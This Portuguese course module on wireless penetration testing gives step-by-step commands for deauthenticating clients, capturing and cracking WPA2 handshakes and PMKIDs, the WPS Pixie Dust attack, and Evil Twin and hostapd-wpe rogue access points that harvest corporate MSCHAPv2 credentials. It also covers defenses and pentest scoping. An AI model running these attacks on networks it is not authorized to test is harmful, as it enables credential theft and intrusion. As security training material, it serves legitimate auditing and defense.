MÓDULO 10 — Wireless Hacking: WPA2/WPA3, Handshakes, PMKID e WPA2-Enterprise (EAP/PEAP)
Team Hacking78
Especialistas em Red Teaming
Resumo Executivo (TL;DR)
Domine a auditoria de segurança em redes sem fio 802.11. Aprenda a operar em monitor mode, capturar e quebrar o 4-Way Handshake do WPA2 com Aircrack-ng e Hashcat, explorar o atalho do PMKID (hcxdumptool), identificar vulnerabilidades de WPS (Reaver/Pixie Dust), montar Evil Twins com hostapd e executar ataques avançados a redes corporativas WPA2-Enterprise (802.1X/EAP-PEAP) com hostapd-wpe para captura e quebra de hashes MSCHAPv2.

O espectro de radiofrequência das redes sem fio (Wi-Fi) ignora as paredes de alvenaria e os limites físicos das organizações corporativas, estendendo a superfície de ataque para estacionamentos, ruas adjacentes e áreas públicas.
Neste módulo prático, você dominará os fundamentos e as técnicas de auditoria ofensiva em redes IEEE 802.11: desde a configuração de adaptadores em modo monitor e captura do 4-Way Handshake, exploração de PMKID e ataques de Evil Twin, até o comprometimento de redes corporativas WPA2-Enterprise (802.1X/EAP) via Rogue AP (hostapd-wpe) para extração e quebra de credenciais de usuários e hashes MSCHAPv2.
10.1 Fundamentos do Protocolo 802.11: Bandas, Canais e Autenticação
As comunicações Wi-Fi operam em faixas de frequências de rádio padronizadas pelo IEEE:
- Banda de 2.4 GHz (2.400 a 2.4835 GHz): Dividida em canais de 1 a 13 (no Brasil e Europa). Apenas os canais 1, 6 e 11 não se sobrepõem e não geram interferência cruzada.
- Banda de 5 GHz (5.150 a 5.850 GHz): Possui dezenas de canais não sobrepostos (36 a 165), maior largura de banda e menor alcance físico. É a faixa padrão da maioria dos ambientes corporativos modernos.
- Banda de 6 GHz (Wi-Fi 6E / Wi-Fi 7): Faixa de 5.925 a 7.125 GHz com suporte obrigatório a WPA3.
[Access Point (AP)] ──> Identificado por BSSID (Endereço MAC) e ESSID (Nome da Rede)
▲
│ Quadros de Gerenciamento (Beacon, Probe Request/Response, Auth, Deauth)
▼
[Station / Cliente (STA)] ──> Identificado pelo Endereço MAC da placa Wi-FiO Espectro dos Padrões de Autenticação Wi-Fi
- Open (Rede Aberta): Sem autenticação ou criptografia em nível de enlace. Todo o tráfego não protegido por HTTPS pode ser interceptado (sniffing passivo).
- WEP (Wired Equivalent Privacy): Criptografia legada vulnerável a ataques estatísticos de vetores de inicialização (IVs), quebrável em menos de 2 minutos com Aircrack-ng.
- WPA (TKIP): Protocolo de transição que corrigiu falhas do WEP, mas permanece suscetível a ataques como KRACK e quebra de handshake.
- WPA2-Personal (WPA-PSK / CCMP-AES): Padrão doméstico e de pequenas empresas baseado em uma chave pré-compartilhada única (Pre-Shared Key).
- WPA2-Enterprise (WPA-EAP / 802.1X): Padrão corporativo que utiliza autenticação individual por usuário via servidor RADIUS, onde cada colaborador possui sua própria credencial.
- WPA3 (SAE - Simultaneous Authentication of Equals): Novo padrão que substituiu o 4-Way Handshake pela troca Dragonfly, mitigando capturas de handshake passivas.
A Regra de Ouro da Auditoria Wireless Redes WPA2 Domésticas baseiam-se na quebra da senha da rede via handshake capturado. Redes WPA2-Enterprise Corporativas baseiam-se no roubo da credencial individual do colaborador (login e hash MSCHAPv2) através de um Ponto de Acesso Falso (Rogue AP).
10.2 Hardware e Configuração do Ambiente no Kali Linux
Para auditorias sem fio profissionais, a placa Wi-Fi interna do computador geralmente não atende aos requisitos técnicos. É indispensável um adaptador USB homologado com suporte a:
- Modo Monitor (Monitor Mode / RFMON): Capacidade de capturar todos os quadros 802.11 trafegando no canal, mesmo sem estar associado a um AP.
- Injeção de Pacotes (Packet Injection): Capacidade de transmitir quadros forjados (como quadros de desautenticação e requisições probe).
- Chipsets Recomendados: Atheros AR9271 (Alfa AWUS036NHA), Ralink RT3070/RT5370, Realtek RTL8812AU (Dual-Band 2.4/5GHz) e MediaTek MT7612U.
Preparação da Interface no Kali Linux
# 1. Verificar interfaces wireless presentes
iwconfig
# 2. Identificar e encerrar processos conflitantes (NetworkManager, wpa_supplicant)
sudo airmon-ng check kill
# 3. Colocar a interface em modo monitor
sudo airmon-ng start wlan0
# 4. Confirmar se a nova interface monitor (wlan0mon) está ativa
iwconfig wlan0mon10.3 Reconhecimento e Varredura do Espectro com Airodump-ng
O Airodump-ng realiza a varredura contínua de canais e captura de tráfego de radiofrequência:
# Varredura ampla em todos os canais
sudo airodump-ng wlan0monLeitura das Colunas Cruciais do Airodump-ng
- BSSID: Endereço MAC do Ponto de Acesso.
- PWR: Nível de sinal recebido (quanto mais próximo de 0, mais próximo você está fisicamente do AP).
- CH: Canal de rádio em que o AP está operando.
- ENC / CIPHER: Algoritmo de criptografia (WPA2, CCMP, TKIP).
- AUTH: Método de autenticação (PSK = Chave Compartilhada | MGT = 802.1X / Enterprise Corporativo).
- ESSID: Nome público (ou oculto) da rede sem fio.
# Sintonizar a captura exclusivamente no AP alvo e gravar em arquivo .cap:
sudo airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/captura_alvo10.4 Auditoria WPA/WPA2-PSK: Handshake Capture, Cracking e PMKID
O Ataque Clássico ao 4-Way Handshake
Quando um cliente se associa a um AP WPA2, ocorre uma troca de 4 mensagens criptográficas (4-Way Handshake) para derivar as chaves de sessão temporárias (PTK - Pairwise Transient Key).
# 1. Manter o airodump-ng em escuta gravando o canal e BSSID alvo
# 2. Em outro terminal, enviar quadros de desautenticação para forçar o cliente a reconectar:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -0 5 : Dispara 5 pacotes de Deauthentication
# -a : MAC do Access Point
# -c : MAC da estação/cliente conectadoAssim que o cliente reconectar, o Airodump-ng exibirá no topo da tela: WPA handshake: AA:BB:CC:DD:EE:FF.
Quebra da Senha com Aircrack-ng e Hashcat
# Quebra via CPU com Aircrack-ng e dicionário RockYou:
aircrack-ng /tmp/captura_alvo-01.cap -w /usr/share/wordlists/rockyou.txt
# Quebra acelerada por GPU com Hashcat (Modo 22000):
# 1. Converter o arquivo .cap para o formato .hc22000:
hcxpcapngtool -o /tmp/hash.hc22000 /tmp/captura_alvo-01.cap
# 2. Executar o Hashcat com regras de mutação:
hashcat -m 22000 /tmp/hash.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.ruleO Atalho do PMKID (Captura Clientless sem Desautenticação)
Em roteadores modernos que suportam PMKID Caching, o identificador PMKID é enviado pelo próprio AP no primeiro quadro EAPOL, eliminando a necessidade de clientes conectados ou ataques de deauth.
# 1. Capturar o PMKID diretamente com hcxdumptool:
sudo hcxdumptool -i wlan0mon -o /tmp/pmkid.pcapng --enable_status=1
# 2. Extrair o hash para o formato do Hashcat:
hcxpcapngtool -o /tmp/pmkid.hc22000 /tmp/pmkid.pcapng
# 3. Quebrar com Hashcat:
hashcat -m 22000 /tmp/pmkid.hc22000 /usr/share/wordlists/rockyou.txt10.5 Auditoria de WPS: Reaver e Ataque Pixie Dust
O recurso WPS (Wi-Fi Protected Setup) utiliza um PIN numérico de 8 dígitos para autenticação rápida:
# 1. Identificar APs vulneráveis com WPS ativo:
sudo wash -i wlan0mon
# 2. Executar o ataque Pixie Dust (explora gerador de números pseudoaleatórios fracos do AP):
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv10.6 Ataques de Evil Twin e Captura de Tráfego
O ataque de Evil Twin (Gêmeo Maligno) consiste em criar um Access Point falso com o mesmo SSID e canal da rede legítima, transmitindo com potência superior e forçando as estações a se conectarem ao atacante através de desautenticação.
[Atacante Kali (wlan1 - Modo AP)] ──> Transmite SSID "WiFi_Corporativo" com sinal mais forte
▲
│ Conexão voluntária do cliente enganado
▼
[Cliente / Vítima] ──> Conectado ao Evil Twin ──> Todo tráfego HTTP/DNS interceptado# Configuração básica do hostapd para Evil Twin:
cat << 'EOF' > /tmp/hostapd-evil.conf
interface=wlan1
ssid=Rede_Alvo
hw_mode=g
channel=6
wpa=2
wpa_passphrase=senha_qualquer
wpa_key_mgmt=WPA-PSK
EOF
sudo hostapd /tmp/hostapd-evil.conf &10.7 WPA2-Enterprise: Ataques a Redes 802.1X/EAP em Redes Corporativas
Em redes corporativas, a autenticação não utiliza uma senha compartilhada, mas sim o padrão IEEE 802.1X integrado a um servidor RADIUS (ex: Microsoft NPS, FreeRADIUS, Cisco ISE).
Cliente (STA) ── [EAPoL / 802.1X] ──> Access Point ── [RADIUS Protocol] ──> Servidor RADIUS / ADA Causa-Raiz da Vulnerabilidade no EAP-PEAP
No método mais popular do mercado (EAP-PEAP com MSCHAPv2), o servidor RADIUS estabelece um túnel TLS criptografado dentro do qual o usuário transmite suas credenciais corporativas.
No entanto, a grande maioria dos dispositivos (laptops Windows, celulares Android e iPhones) vem por padrão com a opção "Validar certificado do servidor" desmarcada ou não possuem a autoridade certificadora (CA) raiz corporativa instalada. Dessa forma, o dispositivo aceita qualquer certificado apresentado por um AP falso.
Ataque com Rogue AP Usando Hostapd-WPE
O hostapd-wpe (Wireless Packet Edition) simula um Access Point corporativo e um servidor RADIUS falso simultaneamente. Quando o cliente corporativo tenta conectar, o hostapd-wpe aceita a negociação EAP e captura o desafio/resposta MSCHAPv2 contendo o nome do usuário e o hash de rede.
# 1. Configurar o arquivo /etc/hostapd-wpe/hostapd-wpe.conf
interface=wlan1
ssid=WiFi_Corporativo_Empresa
channel=6
hw_mode=g
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
# 2. Iniciar o Rogue AP corporativo:
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf# Registro de captura exibido no log do hostapd-wpe:
[hostapd-wpe] MSCHAPV2: User: roberto.alencar
[hostapd-wpe] MSCHAPV2: Challenge: 11:22:33:44:55:66:77:88
[hostapd-wpe] MSCHAPV2: Response: aa:bb:cc:dd:ee:ff:...
[hostapd-wpe] jtr NETNTLM: roberto.alencar:$NETNTLM$1122334455667788$aabbccddeeff...Quebra do Hash MSCHAPv2 (NETNTLM)
O hash capturado pode ser submetido imediatamente ao John the Ripper ou Hashcat:
# Quebra com John the Ripper:
echo 'roberto.alencar:$NETNTLM$1122334455667788$...' > /tmp/hash_eap.txt
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hash_eap.txt
# Quebra com Hashcat (Modo 5500 - NetNTLMv1 / MSCHAPv2):
hashcat -m 5500 /tmp/hash_eap.txt /usr/share/wordlists/rockyou.txtImpacto Estratégico no Engajamento A senha obtida através do ataque EAP é a credencial de domínio Active Directory do colaborador. Ela permite autenticação direta em VPNs, portais de e-mail corporativo, estações de trabalho e compartilhamentos SMB internos.
10.8 WPA3 e Considerações sobre Bluetooth
- WPA3 SAE (Dragonfly Handshake): Protege contra ataques de captura passiva de handshake e ataques de dicionário offline.
- Ataques de Downgrade: Redes em modo de transição mista (WPA2/WPA3) podem sofrer ataques que forçam o cliente a autenticar via WPA2.
- Bluetooth & BLE (Bluetooth Low Energy): Auditorias físicas e de periféricos utilizam ferramentas como
bettercap,gatttooleubertoothpara identificar dispositivos visíveis, serviços BLE sem autenticação e vulnerabilidades como BlueBorne e KNOB.
10.9 Roteiro Profissional de Teste de Intrusão Wireless
1. Definição de Escopo: Endereços físicos autorizados, lista de SSIDs, janelas de horário e RoE.
2. Reconhecimento de Espectro: Mapeamento de SSIDs, canais, BSSIDs e classificação em PSK ou MGT.
3. Teste em Redes Domésticas/Visitantes (PSK): PMKID → Handshake com Deauth → Quebra com Hashcat.
4. Teste em Redes Corporativas (MGT): Rogue AP com hostapd-wpe → Captura de MSCHAPv2 → Cracking de senhas de domínio.
5. Validação de Segmentação: Testar se a rede de visitantes possui isolamento de clientes (Client Isolation) e acesso à rede interna.
6. Elaboração do Relatório: Evidências estruturadas, métricas de tempo de quebra e recomendações técnicas com priorização.10.10 Defesas Corporativas e Recomendações Técnicas
Controles Mandatórios para Redes Corporativas
- Implementação de EAP-TLS com Certificados de Cliente: Utiliza autenticação mútua baseada em certificados digitais em cada dispositivo, eliminando o envio de senhas na rede.
- Validação Obrigatória do Certificado do Servidor RADIUS: Configuração forçada via GPO/MDM para que nenhum dispositivo conecte a servidores RADIUS cujo certificado não pertença à AC raiz interna da empresa.
- Desativação Completa do WPS: Desabilitar permanentemente o WPS em todos os pontos de acesso.
- Implementação de Sistemas WIDS / WIPS: Sistemas de detecção e prevenção de intrusão sem fio capazes de identificar e conter automaticamente Pontos de Acesso Falsos (Rogue APs) e injeções de desautenticação.
- Isolamento de Clientes e Segregação de VLANs: A rede Wi-Fi de visitantes deve residir em VLAN isolada sem nenhuma rota para servidores corporativos.
10.11 Checklist de Conclusão do Módulo 10
- [x] Compreendo a estrutura física e lógica do padrão IEEE 802.11 (canais 2.4/5GHz, BSSID, ESSID).
- [x] Sei configurar adaptadores Wi-Fi em Monitor Mode e Packet Injection no Kali Linux.
- [x] Opero o Airodump-ng para mapeamento de espectro e distinção entre redes PSK e MGT.
- [x] Sei capturar e quebrar 4-Way Handshakes WPA2 utilizando Aircrack-ng e Hashcat.
- [x] Utilizo o método de captura clientless via PMKID com o hcxdumptool.
- [x] Identifico e audito vulnerabilidades de WPS com Wash e Reaver (Pixie Dust).
- [x] Compreendo o funcionamento de redes WPA2-Enterprise e a vulnerabilidade de validação de certificados no EAP-PEAP.
- [x] Sei configurar o hostapd-wpe para criação de Rogue AP e captura de credenciais MSCHAPv2.
- [x] Realizo a quebra de hashes NETNTLM/MSCHAPv2 com John the Ripper e Hashcat.
- [x] Formulo recomendações defensivas robustas (EAP-TLS, validação de certificados, WIDS/WIPS).
Perguntas Frequentes (FAQ)
Qual é a diferença fundamental entre atacar uma rede WPA2-Personal (PSK) e uma rede WPA2-Enterprise?
Na rede WPA2-Personal, todos os dispositivos compartilham a mesma senha pré-definida. O ataque consiste em capturar o 4-Way Handshake (ou PMKID) e realizar força bruta para descobrir a senha do roteador. Já na rede WPA2-Enterprise, cada usuário possui credenciais próprias autenticadas por um servidor RADIUS. O ataque típico utiliza um Rogue AP (hostapd-wpe) para se passar pela rede corporativa, induzindo o dispositivo do usuário a entregar seu login e hash MSCHAPv2 corporativo.
Por que a captura de PMKID é considerada mais eficiente e furtiva do que a captura do 4-Way Handshake?
A captura tradicional de handshake exige que um cliente conectado seja desautenticado via pacotes de deauth para forçar uma reconexão, gerando ruído na rede. A captura de PMKID (via hcxdumptool) comunica diretamente com o Access Point e extrai o identificador de chave no primeiro quadro de associação, funcionando mesmo quando não há nenhum cliente ou dispositivo conectado à rede no momento.
Como o protocolo EAP-TLS elimina o risco de roubo de credenciais por Rogue APs?
O protocolo EAP-TLS exige autenticação mútua baseada em certificados digitais x509: tanto o servidor RADIUS quanto o dispositivo do cliente devem validar os certificados emitidos pela Autoridade Certificadora (CA) interna. Como não há transmissão de senhas ou hashes MSCHAPv2 durante a autenticação, um Rogue AP com certificado autoassinado é imediatamente rejeitado pelo cliente.
O que é o ataque Pixie Dust no protocolo WPS e por que ele é tão rápido?
O ataque Pixie Dust explora uma falha criptográfica na geração de números pseudoaleatórios (nonces E-S1 e E-S2) em chipsets de roteadores legados. Em vez de testar milhões de PINs sequencialmente pela rede, o atacante captura uma única resposta do roteador e realiza a quebra do PIN offline em poucos segundos na máquina local.
